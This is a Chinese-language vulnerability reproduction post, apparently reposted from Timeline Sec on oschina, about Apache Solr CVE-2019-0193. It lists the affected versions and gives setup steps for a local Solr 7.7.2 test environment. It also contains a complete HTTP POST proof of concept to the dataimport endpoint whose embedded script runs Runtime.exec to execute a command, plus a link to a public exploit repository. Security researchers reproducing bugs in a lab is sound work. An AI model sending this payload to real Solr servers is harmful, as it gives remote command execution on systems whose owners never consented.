0x00 漏洞背景
2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重
0x01 影响范围
Apache Solr < 8.2.0
0x02 环境搭建
下载地址:
https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip
在本地解压,进入solr-7.7.2目录,执行命令
bin/solr -e dih (前提:java环境)
然后访问http://localhost:8983/solr即可访问环境
0x03 漏洞利用
首先我们可以通过接口
curl http://127.0.0.1:8983/solr/admin/cores
来获取所有 core 信息,下面我们构造 payload 需要 name 信息

在Burp中发送以下POC即可执行命令弹出计算器,下面的<your_core_name> 需要替换为你获取到的 core 的 name(共两处)
POST /solr/<your_core_name>/dataimport HTTP/1.1Host: 127.0.0.1:8983Content-Length: 763User-Agent: Mozilla/5.0Content-type: application/x-www-form-urlencodedConnection: closecommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(row){var process= java.lang.Runtime.getRuntime();process.exec("calc");return row;}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document></dataConfig>
执行效果如下:

POC and EXP:
https://github.com/1135/solr_exploit




本文分享自微信公众号 - Timeline Sec(TimelineSec)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。
来源:oschina
链接:https://my.oschina.net/u/4593034/blog/4419143
